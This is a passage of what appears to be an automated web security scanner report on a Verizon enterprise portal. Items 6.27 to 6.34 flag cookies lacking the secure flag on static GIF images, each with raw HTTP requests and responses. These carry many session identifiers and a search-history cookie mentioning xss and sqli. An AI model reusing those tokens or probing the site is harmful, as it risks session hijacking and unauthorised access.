TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/footer_1px.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 63
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "3f-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a...............................!.......,............!4 .;

6.27. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 446
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "1be-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7167
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a
.d...............................................................................................................................................................................................
...[SNIP]...

6.28. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_gray_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 445
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "1bd-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7187
Date: Mon, 05 Sep 2011 22:22:44 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:44 GMT

GIF89a
.d...............................................................................................................................................................................................
...[SNIP]...

6.29. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_left.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 336
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "150-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7200
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a
..........................................................................................................HH.HH.OO.OO............................................................................
...[SNIP]...

6.30. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/header_red_right.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/signIn.do?TYPE=33554433&REALMOID=06-3bc2b407-708d-100e-b8d8-80e9104e0217&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=yEpKvw2seAPol78XasYtX0XQ0z1SO8yMK6CDIkxTGYk63aSlmsHTzcEjfuEFE05q&TARGET=$SM$HTTPS%3a%2f%2fenterprisecenter%2everizon%2ecom%2fenterprisesolutions%2fglobal%2fgHome%2edo
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 334
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "14e-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:26 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:26 GMT

GIF89a
....................................................................................................((.==.FF.HH................................................................................
...[SNIP]...

6.31. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/VzWIntegration/pattern_library/i/s.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 43
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "2b-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7193
Date: Mon, 05 Sep 2011 22:22:46 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:22:46 GMT

GIF89a.............!.......,...........D..;

6.32. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_HelpLarge.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_HelpLarge.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; vsrecentsearches=xss%20sqli%20httpi~oss%20sq~wss~xss~xss%20sq; CP=null*

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 634
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "27a-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7145
Date: Mon, 05 Sep 2011 22:40:49 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

GIF89a.........................................................................................................................................................................vvvnnnmmmllljjjiiiYYYX
...[SNIP]...

6.33. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_errorMssg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_errorMssg.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:17 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_errorMssg.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/submitEnrollmentProfileInfo.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 546
Content-Type: image/gif
Last-Modified: Sun, 17 Jul 2011 07:10:55 GMT
ETag: "222-4e228aff"
Accept-Ranges: bytes
Cache-Control: private, max-age=7146
Date: Mon, 05 Sep 2011 22:25:17 GMT
Connection: keep-alive
Set-Cookie: TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
Set-Cookie: TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:25:17 GMT

GIF89a.....G............O.....................................
...d.4...+.............$............(.FR..|....zx....#....................................s..^..c..........................t.............
...[SNIP]...

6.34. https://enterprisecenter.verizon.com/enterprisesolutions/staticcontent/images/icn_video.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/staticcontent/images/icn_video.gif

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

TLTSID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com
TLTUID=90828BEED80D10D81818CE34DA2D2DF9; Path=/; Domain=.verizon.com; Expires=Mon, 05-09-2021 22:40:49 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /enterprisesolutions/staticcontent/images/icn_video.gif HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/default/irepair/QuickTicketIdentify.do
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; 